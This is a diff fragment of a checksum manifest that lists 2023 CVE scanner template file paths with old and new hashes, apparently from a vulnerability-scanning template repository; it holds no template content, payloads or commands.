+http/cves/2023/CVE-2023-2796.yaml:17667149011e110a2fa5d5fc3e9e2d39bdfcea48 +http/cves/2023/CVE-2023-28121.yaml:1e68ea14d35be9823d0510222f17fe122654dbdd +http/cves/2023/CVE-2023-2813.yaml:62914ae5b1294dfee142150ca6062f968462b2c1 +http/cves/2023/CVE-2023-2822.yaml:b6681985725c0221470756f2d04c12f77ee25de3 +http/cves/2023/CVE-2023-2825.yaml:b2964899db62c9f40b40947912a0795943cf05aa +http/cves/2023/CVE-2023-28343.yaml:f6b3e79cd5356bbfea7682166aa1973c646da41f +http/cves/2023/CVE-2023-28432.yaml:a27d97870b4406d6ba909a486d44c6e64c3f0a58 +http/cves/2023/CVE-2023-28662.yaml:ede071ef753338896b37459153402ba8506c07e4 +http/cves/2023/CVE-2023-28665.yaml:c7ea34160278c858993ca4e151493a66c041e685 +http/cves/2023/CVE-2023-29084.yaml:7335430074b2cdc90b92637fcf2145c3a2cdbb5a +http/cves/2023/CVE-2023-29298.yaml:5711b6d64ec8dd61006c8e55f251728f6902ea89 +http/cves/2023/CVE-2023-29300.yaml:5d50df74f1d9133bea7b8e454c08bf4713bebd85 +http/cves/2023/CVE-2023-29357.yaml:bb3bf18aebdf86e3eb3c4f4b4a73b8f72399b9a5 +http/cves/2023/CVE-2023-29439.yaml:6b4d13d29a6d82c006a51c21b21e1a5b65a5355c +http/cves/2023/CVE-2023-2948.yaml:b78688316f38eb82d4343e3641d329f0bd0a5ff5 +http/cves/2023/CVE-2023-29489.yaml:a3a239ba6d4d74673b81b7a951de6dc982bb3721 +http/cves/2023/CVE-2023-2949.yaml:25a623db04b150b47d29371873eb5621cc0bdbbb +http/cves/2023/CVE-2023-29622.yaml:e073cdd1cecc1c12f4c15d92cd4b254f931b8717 +http/cves/2023/CVE-2023-29623.yaml:45672ad306c134cd72076467059d7986e9967728 +http/cves/2023/CVE-2023-2982.yaml:94f463ab73d722e5b527f6d3a9300e93167a364c +http/cves/2023/CVE-2023-29827.yaml:4fdb213a989c56e6f0dd28862c3ed57ff0035f9c +http/cves/2023/CVE-2023-29887.yaml:e57348bffc401dde8d1d8fdfef061d1adac97095 +http/cves/2023/CVE-2023-29919.yaml:11278a84c8aa54248ecf6a3c4df2e639624bbf93 +http/cves/2023/CVE-2023-29922.yaml:e6271c500f962ae0ae3af22aa0530be92384b5b0 +http/cves/2023/CVE-2023-29923.yaml:e7b5b1aa20e939b446fa7d52db0ac03a41959f8b +http/cves/2023/CVE-2023-30013.yaml:a7e4c7bc35c13f4d515cd586604b091640fe0594 +http/cves/2023/CVE-2023-30019.yaml:07babbf47ba1a9a51561999b1e3a7d5e921826cd +http/cves/2023/CVE-2023-30150.yaml:0146ca4ab131ef0c9b930273f8dc166dd751ccc6 +http/cves/2023/CVE-2023-30210.yaml:5813ad5f81384f32da9b1376920592d190809922 +http/cves/2023/CVE-2023-30212.yaml:e78558d9584338de17429906728f353dca4265ac +http/cves/2023/CVE-2023-30256.yaml:21511c5e34cd98222ff485ca650f32c54ea3464d +http/cves/2023/CVE-2023-30258.yaml:23dba33b4278040835f2427ff06c4cab132b3625 +http/cves/2023/CVE-2023-30534.yaml:9e3c7409ced61a7d1cf072990ca73bc728ab5ae3 +http/cves/2023/CVE-2023-30625.yaml:5cdf3a74958ba59dc965b31f8d53010dd466ab95 +http/cves/2023/CVE-2023-3077.yaml:367e6c800adc9e7a6c92611c8afa39321feba633 +http/cves/2023/CVE-2023-30777.yaml:2ec94a35275ee1271b6d0162b11c66c4325d8c33 +http/cves/2023/CVE-2023-30868.yaml:7be43ec76fe6720e2d580becb0a56a9dc9064584 +http/cves/2023/CVE-2023-30943.yaml:c0a84c92afc5a463fc61c6f49cbc2306afa588f2 +http/cves/2023/CVE-2023-31059.yaml:fc3b7caa3f935dd0a6c22a0eedab3f5d8b4efb94 +http/cves/2023/CVE-2023-31446.yaml:d66aee208b3ad48b06662d345a778e0d90d4a243 +http/cves/2023/CVE-2023-31465.yaml:34cb2d553d530d7ad867cf82d889cba8c6153019 +http/cves/2023/CVE-2023-31548.yaml:0f5f5182e5679b2d22cc503cd577b487ef7fe72d +http/cves/2023/CVE-2023-32077.yaml:192b2e98d47431591fdc129945ac8c09a9c80ce0 http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b -http/cves/2023/CVE-2023-3219.yaml:c46ed7525586b1c547845920673b96a6e86127a0 +http/cves/2023/CVE-2023-3219.yaml:a3584e7e7600e84c3026faded846c127adebee8f http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818 -http/cves/2023/CVE-2023-32243.yaml:8ae07df0b47534703abacd4d2c9474cca42f155b -http/cves/2023/CVE-2023-32315.yaml:8cf24a6668a033f97bd47995c00cdfbf712cf7f4 -http/cves/2023/CVE-2023-32563.yaml:95800677fc85fb7a2999fc4dc0ecf4e14bdca824 -http/cves/2023/CVE-2023-33338.yaml:c9eed5096c30da7f644c453c160feabc8a4355d9 -http/cves/2023/CVE-2023-33405.yaml:a640122d300395a4e99b838b7d061964f71e2f7e -http/cves/2023/CVE-2023-33439.yaml:8a4ef47375c4439dba0466e6fb47fb8db3a6bbec -http/cves/2023/CVE-2023-33440.yaml:374a71661f7cb91affcdf607230fed081f768e1e -http/cves/2023/CVE-2023-3345.yaml:cb4f16c52525fd9d663107fa526a3b492ebe2f51 -http/cves/2023/CVE-2023-33510.yaml:99678e95f4277c8a99b1dc46a24ca66e629a223a -http/cves/2023/CVE-2023-33568.yaml:f46aad9a8833fa3fd49afb682fbdacd7059e3f66 -http/cves/2023/CVE-2023-33584.yaml:eafc5fa5e6d962f60a0d1c322d0c5da4a2729a86 -http/cves/2023/CVE-2023-33629.yaml:13e85760aa63f2c8756ecec84fbe8e154b50a41e -http/cves/2023/CVE-2023-3368.yaml:dba7d3e69bd350c5b5abfcf5c0fabaa0af3f1d93 -http/cves/2023/CVE-2023-33831.yaml:4d063581ef083cada73ee70f294f1ce4ab5aea08 -http/cves/2023/CVE-2023-34020.yaml:8703548ce5bb1c081556a2765db8d12b798a1e12 -http/cves/2023/CVE-2023-34124.yaml:ed112c5205c463f82545b656dfff5121e3980c08 +http/cves/2023/CVE-2023-32243.yaml:12f4b4530ce4e76db0f256859ab890a9146307a2 +http/cves/2023/CVE-2023-32315.yaml:990bab828ef146320b4c5cba1cb4323f4e30eb93 +http/cves/2023/CVE-2023-32563.yaml:44cd044910d9126b3895a2b9b810c7244c6b3899 +http/cves/2023/CVE-2023-33338.yaml:1fb9344bc45d0ca490046cd0c948e5d1cf7974c9 +http/cves/2023/CVE-2023-33405.yaml:128e1bcd0957fd5f4f048951ed46ca5ffe253a17 +http/cves/2023/CVE-2023-33439.yaml:73b80afeedf742a50cc3316c01c8d6304680569f +http/cves/2023/CVE-2023-33440.yaml:9ffe9d8e6e4974614215b8beb8c8aba10db07dfa +http/cves/2023/CVE-2023-3345.yaml:aabe8c491d1bea611b75c123b469b4c968571fa9 +http/cves/2023/CVE-2023-33510.yaml:6db13769fa328f1cf80d6f5fb6adcdc9b8f1f53a +http/cves/2023/CVE-2023-33568.yaml:785724178bb0f9cbb97d985c085d3d038efa75e9 +http/cves/2023/CVE-2023-33584.yaml:77d714a7b592d8ba4975902502a902e91567dd97 +http/cves/2023/CVE-2023-33629.yaml:3e2d86b9ca6281c3769bd285ca5c56de8badddd2 +http/cves/2023/CVE-2023-3368.yaml:1abf608433be5f74fb0b41192480f6e1dbea06c0 +http/cves/2023/CVE-2023-33831.yaml:d80149df9e07bfcf710151dc4f396dade4486200 +http/cves/2023/CVE-2023-34020.yaml:8099d3e12f8a10e2d96d8bd1dc9161f04f821fb1 +http/cves/2023/CVE-2023-34124.yaml:73042d74ae02e14a69bbc74952d41b3dc4aacc5e http/cves/2023/CVE-2023-34192.yaml:9ec18d446637d67669489485e338d8bb08e3e95a -http/cves/2023/CVE-2023-34259.yaml:53d252753ec9ffdb7385613c9fc1e7acff11f706 -http/cves/2023/CVE-2023-34362.yaml:2defe48ad70af441465ed508caaed981af0825c6 -http/cves/2023/CVE-2023-34537.yaml:de72e5d681a186ec3cd07866bd4ecbfa04344976 -http/cves/2023/CVE-2023-34598.yaml:31027299b822e6295019acf7ef142e50f6403be0 -http/cves/2023/CVE-2023-34599.yaml:1b3ef5d79d30b77550a4ebc0c4875257044f4360 -http/cves/2023/CVE-2023-3460.yaml:b7708c9ebad15739adf807650decba11fdb4ebaa -http/cves/2023/CVE-2023-34659.yaml:c30ad12e28880774e76add398eb672ed3e25a615 -http/cves/2023/CVE-2023-34751.yaml:8f9603914eb7aef1f81029aad80eb71604fa6dab -http/cves/2023/CVE-2023-34752.yaml:ff56504570eafb7792b5799e419679656609b222 -http/cves/2023/CVE-2023-34753.yaml:b7656cee1fb99f2107f0f738982662e8d7245b58 -http/cves/2023/CVE-2023-34755.yaml:3a3d1170074407156af957173fcd4a173163c75e -http/cves/2023/CVE-2023-34756.yaml:d1bc6393c9d7d9a7ad126dccc9df44bd169631b6 -http/cves/2023/CVE-2023-3479.yaml:0784a947aedebf06be9a59489f27e9809c6008ba -http/cves/2023/CVE-2023-34843.yaml:0f887df5018fcee007d9f4db1d230225d5ea5429 -http/cves/2023/CVE-2023-34960.yaml:4ac0866851e925322a4a45731b61aa1501f86812 -http/cves/2023/CVE-2023-34993.yaml:c900dca1572604053d61238fc052ef56f323d53b -http/cves/2023/CVE-2023-35078.yaml:b75286479f8e1d29956fdc7f9bc5ee75a449e9a6 -http/cves/2023/CVE-2023-35082.yaml:11b40acb6631fbeeaad7d0c53ffd73674010acb0 -http/cves/2023/CVE-2023-35158.yaml:d454ecf18e745f94f94e6ff53c024b4b567f17e2 -http/cves/2023/CVE-2023-35813.yaml:0c33f2cf908fb846444a9fe52e35ca988bbf45da -http/cves/2023/CVE-2023-35843.yaml:c1cc99b3a57a4224468c01aa6d71f3981711d543 -http/cves/2023/CVE-2023-35844.yaml:a25d1bfaa4d327f10d8e159876db043e4c12175c -http/cves/2023/CVE-2023-35885.yaml:83ea672d69a4e29cad43d7cf700a6d66c303c77b -http/cves/2023/CVE-2023-36144.yaml:71762c73decead0fc42e87a1e98f35a0b2529822 -http/cves/2023/CVE-2023-36284.yaml:6fdaf3119a0013f4533b6dc092188b8567774c24 -http/cves/2023/CVE-2023-36287.yaml:c521ad2d7d5ae1a871ebc35a4a15500462bbdb11 -http/cves/2023/CVE-2023-36289.yaml:3807badb58850b7acaaa06c11970e71dad06574a -http/cves/2023/CVE-2023-36306.yaml:13fb2c5b6a1653c9d9cb736ae4f782904737c268 -http/cves/2023/CVE-2023-36346.yaml:5791a6c2d336e3c899310082fda7b0c9ac10a92d -http/cves/2023/CVE-2023-36347.yaml:f684d219d03696666a15e76924aa7a5383753f39 -http/cves/2023/CVE-2023-36844.yaml:7dcd305c47dc04179ef10d8b3552a45aa16f5583 -http/cves/2023/CVE-2023-36845.yaml:a2d752e8d1ec8fc36029a21f54bb220bb9dc20da -http/cves/2023/CVE-2023-36934.yaml:10b5d186463b5f198af80ab025fe671eb1c77284 -http/cves/2023/CVE-2023-3710.yaml:bc15cfc8edecec55aada5edd5c261fb8d9212500 -http/cves/2023/CVE-2023-37265.yaml:00e3b3910291fd4c79d55a3662377f4f2cf4ddec -http/cves/2023/CVE-2023-37266.yaml:34c2063be8df16c0ba77ed1ef3b07dbf2af5ac16 -http/cves/2023/CVE-2023-37270.yaml:5419bb3c958b79043c409f887734b1912584232a -http/cves/2023/CVE-2023-37462.yaml:19ab85bbc2977b2891531e89feeba5ef66cb0ea6 -http/cves/2023/CVE-2023-37474.yaml:40bed5fd8b2c00e3ef251d18f8f02aaf30cf58f8 -http/cves/2023/CVE-2023-37580.yaml:c938dbecf98604df0f634282ec5b6219cbb94039 -http/cves/2023/CVE-2023-37629.yaml:4e68a34b5807294d0241d68a115e89609dc07174 -http/cves/2023/CVE-2023-3765.yaml:0c32fc7c9f67d3a5f4614a438d72e5b78486cc55 -http/cves/2023/CVE-2023-37679.yaml:1477d84b685e9596a4683b888bba12ef45315dc3 -http/cves/2023/CVE-2023-37728.yaml:ae8eefeec6f7ac2a1ae096f19cbccefa1f0d1b72 -http/cves/2023/CVE-2023-37979.yaml:c1db6eb563e1c4c88b768ddbf4134c0557c04161 -http/cves/2023/CVE-2023-38035.yaml:1e6f26ae79f4e647ad6e36692754f8c2e7e42531 -http/cves/2023/CVE-2023-38203.yaml:4abdf0b503ac93b779418c3dbc0be249193c6b21 -http/cves/2023/CVE-2023-38205.yaml:685f22ade81e6cd487981e113b06f7941d429806 -http/cves/2023/CVE-2023-3836.yaml:c55fd698b64e14277abada54ba78e8e8ab1610f6 -http/cves/2023/CVE-2023-3843.yaml:f1b1ed4a3ba55a1e6a6675d1cf6c9b4bc52b43a7 -http/cves/2023/CVE-2023-38433.yaml:8af19ca4d3a95914d516737976c68b75cc940e2f +http/cves/2023/CVE-2023-34259.yaml:29e00e6317898a17f5c645a1badf181d0b0644f9 +http/cves/2023/CVE-2023-34362.yaml:d477a1c3b81d3f95ec32840f9220c43d5de0ca13 +http/cves/2023/CVE-2023-34537.yaml:f522eb1205c0fe3269161294c6c0e40ecd314aaa +http/cves/2023/CVE-2023-34598.yaml:2ea20180baeee33c4308f3aaf378551c82a62ab8 +http/cves/2023/CVE-2023-34599.yaml:daf4f9803ce89168da4bf5a2e5cd3d89a1fd0d30 +http/cves/2023/CVE-2023-3460.yaml:2ba192fea89458954299c6b16ad3558abc8cc29a +http/cves/2023/CVE-2023-34659.yaml:a165041e2b2c2e808d2ad5e955340a29696b62cb +http/cves/2023/CVE-2023-34751.yaml:b99e81a177638904a2fefdcae424fa1613025bd8 +http/cves/2023/CVE-2023-34752.yaml:b851b0fecf5b4d45b0cc9995a3f2c734e2a0793c +http/cves/2023/CVE-2023-34753.yaml:a342d1fc933c16d3abdaae9e1bba40a4ba88930a +http/cves/2023/CVE-2023-34755.yaml:a05a1c3f0534f47832a6ef45fe018222f7e17c3b +http/cves/2023/CVE-2023-34756.yaml:94f3f6d9c6559c556cf3729c19fbe074e41278ff +http/cves/2023/CVE-2023-3479.yaml:f564c46965bb1588b0fcafb3502da2beae0025bc +http/cves/2023/CVE-2023-34843.yaml:8ea29c8040509849e34300a31fd476737346e523 +http/cves/2023/CVE-2023-34960.yaml:2381f80be16cbf186c85b3b4db809e1d41a14499 +http/cves/2023/CVE-2023-34993.yaml:a3b0085c4446e25e6ef80234261084ccffc71e4b +http/cves/2023/CVE-2023-35078.yaml:eb4b036b8f80137073704a8349d2343da6c69d3e +http/cves/2023/CVE-2023-35082.yaml:1960a0ae8e9d496db2e08cb10e25229895f9f284 +http/cves/2023/CVE-2023-35158.yaml:a4744cff56bc5b12153d1cc54b959bb290742e7f +http/cves/2023/CVE-2023-35813.yaml:aa0e5860ccecad4632ec6526f0f6b2732f91e4e8 +http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 +http/cves/2023/CVE-2023-35844.yaml:3afe70bf8e3e05945e34c3f9b5b65fec8286f1f6 +http/cves/2023/CVE-2023-35885.yaml:56e1d36ae12f90e2749cd6c9ca1290ba2cf97c65 +http/cves/2023/CVE-2023-36144.yaml:166e404d9c3c59723801f07c33cc8ba78d03e70e +http/cves/2023/CVE-2023-36284.yaml:d40dcff483b8d8ea5d59b2489179bc65b3f8e3d7 +http/cves/2023/CVE-2023-36287.yaml:7f3341d0aa2cfaf19f8b259f6d6e9b3667aef2b5 +http/cves/2023/CVE-2023-36289.yaml:4626b6dbf62ee313dfa3e667ad3f6e8ea8cb1c01 +http/cves/2023/CVE-2023-36306.yaml:674f574793a5920dcb55fff45751621aad280b71 +http/cves/2023/CVE-2023-36346.yaml:d18a4a45752c1d26dae308c33515cdc9ff7536b3 +http/cves/2023/CVE-2023-36347.yaml:a73937d7aa71cd24f8c6995212d453f3b01c31e7 +http/cves/2023/CVE-2023-36844.yaml:2f342d055540f1bb5d66ce79e0732a807922a919 +http/cves/2023/CVE-2023-36845.yaml:089f0e70780755db463b1bc19f8b879313529e4f +http/cves/2023/CVE-2023-36934.yaml:00fd5e39f91d83c208f7389a8af2c81cfdbd3e28 +http/cves/2023/CVE-2023-3710.yaml:21a07e78c7d194842b8698d5f1a63e599f6a5250 +http/cves/2023/CVE-2023-37265.yaml:5bdc99de362a32457ea2d47e6016e9f029500d51 +http/cves/2023/CVE-2023-37266.yaml:d70774086f0005182bd3aca28114770a90bca39b +http/cves/2023/CVE-2023-37270.yaml:e019ce8cf6428c84bcc3fed7018844b1fe5f6978 +http/cves/2023/CVE-2023-37462.yaml:0b7dcbd2f1508fa93bdf119bf9e48160abf3dc3c +http/cves/2023/CVE-2023-37474.yaml:a6565d9a008a046e497384b2e3c54f2665ab21ce +http/cves/2023/CVE-2023-37580.yaml:813cb73932395c78efbf0269ebcfb600bb3fa716 +http/cves/2023/CVE-2023-37629.yaml:6b9aba73f2319467150cfdfb282cfb95d271174b +http/cves/2023/CVE-2023-3765.yaml:d0b4f1dddc5ea97c723cc2133db4270ff725875e +http/cves/2023/CVE-2023-37679.yaml:29efbfd3a0100150e0968b3c3eaf06ac5e9cc1cf +http/cves/2023/CVE-2023-37728.yaml:ac81f7c70eb71e4be0b34803997d2eba6a64167b +http/cves/2023/CVE-2023-37979.yaml:3542eab145a3bbe02375368006db5afcbb8c76ca +http/cves/2023/CVE-2023-38035.yaml:e7b134bab0c3250aa7674c8a90cfaf4c2a5dd75b +http/cves/2023/CVE-2023-38203.yaml:c59d035901d7b673fda7c46633013784828c95c0 +http/cves/2023/CVE-2023-38205.yaml:dde3c7e1a96a0780715e447411138049c1c4f23d +http/cves/2023/CVE-2023-3836.yaml:3189f131c74d753b3f456ca5ac3faf0c2f3e0e80 +http/cves/2023/CVE-2023-3843.yaml:e8aeab54aa508fc232b867618cdb37eaa7d9061e +http/cves/2023/CVE-2023-38433.yaml:850b3ba22d16833e0e5888ae6428b255bb7edd2d http/cves/2023/CVE-2023-3844.yaml:41358b9a547fc658630cd5192e8f5fd24359d2b1 -http/cves/2023/CVE-2023-3845.yaml:a058fa56bd9afd4c7fe9039d01299be7f2b0387b +http/cves/2023/CVE-2023-3845.yaml:ce7fcd2beaf4569029a2858d37901b8cf459d940 http/cves/2023/CVE-2023-3846.yaml:4ed1668afe32b491fdc55b828e4a5611c0967f44 -http/cves/2023/CVE-2023-3847.yaml:19741808d71bd63c323ccebb3f1d2ba9ef1de84d -http/cves/2023/CVE-2023-3848.yaml:2ee0f1cd35093ecbc95d6463be4d7c0b96be887d -http/cves/2023/CVE-2023-3849.yaml:f55bec87afdb536995985bc94a3a789752373543 -http/cves/2023/CVE-2023-38501.yaml:7d6a6df111f2736db6f28c4f5b8f70bc26903486 -http/cves/2023/CVE-2023-38646.yaml:cc57e9d1027bbe9145a4a8e1f1e88156deb06350 -http/cves/2023/CVE-2023-38964.yaml:e1c3467ec6d109844705546205c87d038110b216 -http/cves/2023/CVE-2023-39002.yaml:52ebe9dff5ee28922febf801a3bb95030da8acad -http/cves/2023/CVE-2023-39026.yaml:041116b66d543937bdc51c4430296fb2a3b5b8a3 -http/cves/2023/CVE-2023-39108.yaml:c1b83450ef1e0a64d4b9d9eae5406929006b9806 -http/cves/2023/CVE-2023-39109.yaml:127b33851616ea34701f58d253e55e469a64571d -http/cves/2023/CVE-2023-39110.yaml:de40021a1ae0f2751f435cc3884f568ce795422a +http/cves/2023/CVE-2023-3847.yaml:60407e2940cf8f721eb6f942c68ee24d68185a34 +http/cves/2023/CVE-2023-3848.yaml:0dfa9f82d648a6f7c421af52421bded8f1f5bb6d +http/cves/2023/CVE-2023-3849.yaml:8d921cdb62c336eadc8abebe7947cad3ec493b27 +http/cves/2023/CVE-2023-38501.yaml:caacffd1047e5d298f452d113ed290181b54a1f8 +http/cves/2023/CVE-2023-38646.yaml:b545190ed42626f3a49b4bc2bd98ec54899acbc2 +http/cves/2023/CVE-2023-38964.yaml:5c49a7987f8b490e18be173969a1371cd0d8a41d +http/cves/2023/CVE-2023-39002.yaml:3449001ccee7076abec235de9bd4659071202c37 +http/cves/2023/CVE-2023-39026.yaml:fc71aafa8c88cc2a530f4a7842ff2ba12d6c6eed +http/cves/2023/CVE-2023-39108.yaml:f5db8fc08678303bd462b24bf153d3c23c0350ec +http/cves/2023/CVE-2023-39109.yaml:3e84fb48e4dea9672eaac9e32660ae57ffede95a +http/cves/2023/CVE-2023-39110.yaml:1d75da26409647a1f57071a40f570b28ea1c210a http/cves/2023/CVE-2023-39120.yaml:fe50f8e80ac67803942ed0b7fd0204e8f1fadbfc -http/cves/2023/CVE-2023-39141.yaml:107751338e25ebbd981829c2d937e9a1f8f60c31 -http/cves/2023/CVE-2023-39143.yaml:e20d6dbb9d5c577e44cf112ff83030e9e694bc11 -http/cves/2023/CVE-2023-3936.yaml:8286c086051a0b10e973d57c92c958e57a5257dd -http/cves/2023/CVE-2023-39361.yaml:3e466a41d9e0eade6589f47678451baf6ebbbebc -http/cves/2023/CVE-2023-39598.yaml:b6cbf6f5f31905988a1568ec0ad02d638a60c8a5 -http/cves/2023/CVE-2023-39600.yaml:f594f2061238379154bf97dcf1ff8830362c94b4 -http/cves/2023/CVE-2023-39676.yaml:6ae66310705d77a801f51b24c4f23badc1f9ffd9 -http/cves/2023/CVE-2023-39677.yaml:ccad01e66e9c6cbfa8c85c6946710f37fb4be991 -http/cves/2023/CVE-2023-39700.yaml:f31e713f3b9d4e03948d00ad0d94e84fc08d13d3 -http/cves/2023/CVE-2023-39796.yaml:652e2a7957da667b3dd805940d9de12d10e0ce7e -http/cves/2023/CVE-2023-40208.yaml:d26fb10881a5128ffe3884f4ae0c5df84784fd98 -http/cves/2023/CVE-2023-40355.yaml:e830e5b4bfdd4361ebf7066155078da07a178821 -http/cves/2023/CVE-2023-40779.yaml:79d01a88f26d82c5f4256632542249ca4e6ae608 -http/cves/2023/CVE-2023-4110.yaml:0093d833acd76053a647314f2896e274d1254cff -http/cves/2023/CVE-2023-41109.yaml:58697d5ce98d5cc1842596763241100ff1afb0b4 -http/cves/2023/CVE-2023-4111.yaml:ae83919e66a9f5addc96ea0f7f859e8c08ff9115 -http/cves/2023/CVE-2023-4112.yaml:f148ae909334c925f571ce9de4ce07fabfb16d89 -http/cves/2023/CVE-2023-4113.yaml:389451cef87bb8ffaabfc8213665370d035280e1 -http/cves/2023/CVE-2023-4114.yaml:a22313e17040379001d1e9eef07dc34529e2249b -http/cves/2023/CVE-2023-4115.yaml:0eb9bb4aaea99ff7103d00edb065f20f52a7d2eb -http/cves/2023/CVE-2023-4116.yaml:e91e80aad8c3b22ff58d3a6535088b3a36f284af -http/cves/2023/CVE-2023-41265.yaml:5f472d26913bc18ac633b38588b85a1346d74bb6 -http/cves/2023/CVE-2023-41266.yaml:71f32d9b3d35beba978e80492799b8e3ebeebaef -http/cves/2023/CVE-2023-4148.yaml:49e8f3a0a99a43b86cf98bf0aa5987008f76118f -http/cves/2023/CVE-2023-41538.yaml:c9051b5fe3e82378f98ff3d81323ec2b7c0f09ed -http/cves/2023/CVE-2023-41642.yaml:45ca13061c37fa3cd5e207717a72a365a1387207 -http/cves/2023/CVE-2023-4168.yaml:9155e9ec28f2164a98ee91eb94a8068c65893efe -http/cves/2023/CVE-2023-4169.yaml:52b490d095332be0ae34ac4b731f5e9e717fc128 -http/cves/2023/CVE-2023-4173.yaml:86e4e5336155967198130352e74e6959e95444b6 -http/cves/2023/CVE-2023-4174.yaml:fa3a8f00b09fc61884d81b2d8b65086459cb417c -http/cves/2023/CVE-2023-41763.yaml:fd53172133c81d605446ea08aba8b5c917baad00 -http/cves/2023/CVE-2023-41892.yaml:4eb18a27213425ee06bf5bf2d68c9d59d7cf6189 +http/cves/2023/CVE-2023-39141.yaml:1f5741a82daa48e1242abe049c9c2ac7d63b9673 +http/cves/2023/CVE-2023-39143.yaml:175a3cbb4a85e3c56d37dd43f0316984a11bcaf4 +http/cves/2023/CVE-2023-3936.yaml:86f325fd48ca47e7f4cdfe3581027bc2514c4f12 +http/cves/2023/CVE-2023-39361.yaml:53379bb2dc1b7b6fda25a6b9b031da51b7017423 +http/cves/2023/CVE-2023-39598.yaml:9049f96d9df80ac7f18e9dc60b243a9a29b29454 +http/cves/2023/CVE-2023-39600.yaml:19487bb36baf066ca01bf3fab2c013086083c304 +http/cves/2023/CVE-2023-39676.yaml:22d457a3bdff95a774399f03bf8a75a652a8789f +http/cves/2023/CVE-2023-39677.yaml:0ad5146b105373f328f09bbee9b0394c8186ac63 +http/cves/2023/CVE-2023-39700.yaml:01ab37659c7031b101f3ea6bd08134b98d8a317b +http/cves/2023/CVE-2023-39796.yaml:a729bba89e9885a729b5fd594b78afc93de872b1 +http/cves/2023/CVE-2023-40208.yaml:3bd72bed6969fb8149de3c31b7909d9c88799d1f +http/cves/2023/CVE-2023-40355.yaml:7761faee9b0236c926e300d32db3a9508227204d +http/cves/2023/CVE-2023-40779.yaml:4cd840617f8f7a59b0d31f37c0a0d2c089c2762a +http/cves/2023/CVE-2023-4110.yaml:83f4284a809037eb7d4ef4b7b3f11deadb3440af +http/cves/2023/CVE-2023-41109.yaml:c8149b1952ea7315ce40e355fd02b165c46cbad8 +http/cves/2023/CVE-2023-4111.yaml:437dd6aa165710e549632a8b1a48ba5bdfed9c4a +http/cves/2023/CVE-2023-4112.yaml:189a46f7d9458fd3110e2c9828872deb106f1e5f +http/cves/2023/CVE-2023-4113.yaml:9718137c9767d86dce907f001a2e138fb4d7841e +http/cves/2023/CVE-2023-4114.yaml:5ba02fe30cf771bc4115635a3984bebc3457118b +http/cves/2023/CVE-2023-4115.yaml:b0d90d4bf5bb9dcac3b1b52d45aaa0f2d586613e +http/cves/2023/CVE-2023-4116.yaml:79915a9eaf103dac3be5fc934c949e78fbd319e2 +http/cves/2023/CVE-2023-41265.yaml:d38544289b23e65bb65723da2f94d926e03bc3e0 +http/cves/2023/CVE-2023-41266.yaml:f7cb353f5de770a87d089f632b1612052f0319d0 +http/cves/2023/CVE-2023-4148.yaml:dd568e6c72619e2d55cc4ef764fc5944636c7946 +http/cves/2023/CVE-2023-41538.yaml:4e735c71f54ac27baa8987be74e444bbe0f9775c +http/cves/2023/CVE-2023-41642.yaml:fbee72e0d62b6fa6c43e1bb34c5800412ac27d0e +http/cves/2023/CVE-2023-4168.yaml:0006757cc3858b565e930fb9235b2269e59b1d64 +http/cves/2023/CVE-2023-4169.yaml:639f6a6b20b2c228fb24159376e31c38682b5364 +http/cves/2023/CVE-2023-4173.yaml:365d1cb5b2bebe20e788d65518fc610e8a22ce87 +http/cves/2023/CVE-2023-4174.yaml:fc65029f2aaeebb1a5e37d04bfc498941a584c0d +http/cves/2023/CVE-2023-41763.yaml:536064beb3e34c084d16d18c2bed0f5db2296bfc +http/cves/2023/CVE-2023-41892.yaml:f6020a88dbaff06019ec79f60686616bb17db2b2 http/cves/2023/CVE-2023-42343.yaml:c1bffaa8664049b88b3f225dccf9b3e372fdf1bd http/cves/2023/CVE-2023-42344.yaml:674f69182dcf67d59a4a19c9adfc0b2e92fe5645 -http/cves/2023/CVE-2023-42442.yaml:5b93bd3379eb1286c01369b8ac0db7274951a209 -http/cves/2023/CVE-2023-42793.yaml:7609627dfc943e8a98e63a223c2666acbe6f88be -http/cves/2023/CVE-2023-43177.yaml:3fc70b3e12cd6c102e9a912a5ec99deda74fb2d9 -http/cves/2023/CVE-2023-43187.yaml:bc5c5b9d077e21da92d16d832b6bdfbaa107b85b -http/cves/2023/CVE-2023-43208.yaml:9571171f304a06c1e2e175e83f87717c7574d327 -http/cves/2023/CVE-2023-43261.yaml:353153b24243a42ec58e7d82b93ca737b0f44081 -http/cves/2023/CVE-2023-43325.yaml:dea8bfbceeb76f9949bcbe3953c866b40e42b9f6 -http/cves/2023/CVE-2023-43326.yaml:e65d5e0574b5dbb97f7f15499a1dfd45cc9bd8af -http/cves/2023/CVE-2023-43374.yaml:4390a5192fbce5dcd0ae6cbaea3baac59ea72a17 -http/cves/2023/CVE-2023-43795.yaml:04fb141516ef06b963bd3c63b4b41f3e901f6b54 -http/cves/2023/CVE-2023-4415.yaml:ef3f313e45a4a534af38945a6409948358549ae3 -http/cves/2023/CVE-2023-44352.yaml:2f065bd348decd9a4ef21471a01821dfd7e64e74 -http/cves/2023/CVE-2023-44353.yaml:29dc295e3d7d42134ad3c53ce51c6f2263134055 -http/cves/2023/CVE-2023-4451.yaml:c5b9465bf0dc2e2f9631d686d15d0e616cb4489d -http/cves/2023/CVE-2023-44812.yaml:ee661e9f8e533aadb1b5646815991b454d5f1a50 -http/cves/2023/CVE-2023-44813.yaml:f8897152666aadf2fb7a52d8317115f24321b469 -http/cves/2023/CVE-2023-4521.yaml:cd4aff1800214d7703661498ae91ee2101070b4a -http/cves/2023/CVE-2023-45375.yaml:36bdf1a241658b6b389fe31a66d62e913d9217dd -http/cves/2023/CVE-2023-4542.yaml:7796c7d2400f3188394c96d287f226ee141b7d0b -http/cves/2023/CVE-2023-4547.yaml:757165c5376f308ea1d88713aa90b620c94b6949 -http/cves/2023/CVE-2023-45542.yaml:fbab2269d3d329f1ac722842d4852760eb4a33f4 -http/cves/2023/CVE-2023-45671.yaml:44371e98ac18a13b6f4913a31db8b25bf8a6976f -http/cves/2023/CVE-2023-4568.yaml:499f357c250a5fe0e30c20955f817a63c4ead9a6 -http/cves/2023/CVE-2023-45852.yaml:b6e39de864aba6e0fe97f4a681d46e2f3a364238 -http/cves/2023/CVE-2023-45855.yaml:ea4416c0b3b510bbe87c43955e30a945834d1566 -http/cves/2023/CVE-2023-4596.yaml:0cd82451c3af3de042fb9028a37d07e9cf29983a 